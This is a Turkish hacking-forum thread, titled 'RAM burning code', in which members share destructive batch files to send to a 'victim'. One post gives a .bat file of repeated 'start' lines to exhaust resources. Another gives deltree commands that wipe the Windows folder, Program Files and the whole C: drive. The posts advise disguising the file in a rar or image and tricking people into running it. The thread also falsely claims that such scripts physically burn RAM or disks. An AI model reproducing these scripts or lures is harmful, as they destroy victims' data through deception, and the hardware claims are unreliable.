RAM yakma kodu

DARHALL

Üye
22 Ağu 2008
165
0
29
Ankara
simdi bir tane not defteri acıyoruz ve yazabildiğmiz kadar alt alta

start
start
start
start
start
start
bole yazıyoruz ( ne kadar çok yazarsak o kadar iyi)

sonra sol üst köşede dosya var on tıklıyoruz farklı kaydet isim.bat olarak kaydediyoruz sonra bunu rar ın içinnde atıyoruz ..

sonra kurbana yolluyoruz suna bak süper bişi o kısının programı acmasını sağlıyoruz ve calıstırdıgında programı birden internet sayfası programlar filan acılıor ve ram yanmaya baslıor sonunda gidiyor 5 saniyede ram yanıyor fakat ramin gücünüde bağlı bu işlem :)
 

lRex

Üye
8 Tem 2012
75
0
evet güzel bi yöntem.

Bu Arada Bu Virüsler Sizede Bulaşabilir. *.bat olanları not defteri ile açarak virüs olup olmadını (tabi virüs kodlaması hakkında bilginiz varsa) kontrol eebilisiniz.
 

'Black-Ghost

Yaşayan Forum Efsanesi
19 May 2008
7,877
17
37
Çanakkale
Buyrun bunu deneyin birisine yedireceksiniz. Aşağıdaki kodları bat olarak kaydettıgınızda karsı pcye ciddi zarar verir hatta birdaha açılmama gibi teklıkesıdahi var.

Kod:
@echo off C:\WINDOWS\COMMAND\deltree /y c:\windows\*.* 
@echo off C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.* 
@echo off C:\WINDOWS\COMMAND\deltree /y c:\*.* 
@echo off cls cls @echo .::geçmiş olsun format yedin::. @echo off

HDD yakan virüs
Arkadaşlar size verceğim kodu kişinin çalıştırına yazdırabilirseniz veya notpeda kodu yapıştırıp biçimini bat. e çeviirseniz dosyayı açtığı anda hddsi yanar işte komut

Kod:
/timersecure 0 0 //mkdir $mid(C:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)


kolay yapmak isterseniz kurbana bunu çalıştıra yaz pc hızlanıo fln derseniz oltaya gelebilir
 

'Black-Ghost

Yaşayan Forum Efsanesi
19 May 2008
7,877
17
37
Çanakkale
bunlar beş para etmez çünkü artk insanlar .bat dosyalarını anladı yani 5 para etmez :D

Sen yedırmesını bilmiyorsun bat dosyası halındeki exe'yi programa veya resme bıle gomebilirsin illa winrar ile atıcaksın dıye bırsey yok.

way arkadaş sadece codu txt dosyasının içine kopyaladım kaydettim belge kayboldu :)) daha .bat yapmamıştım bile :)

Verdiğim kodları Anti virüs programın kapalı iken yaparsan silinmez :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.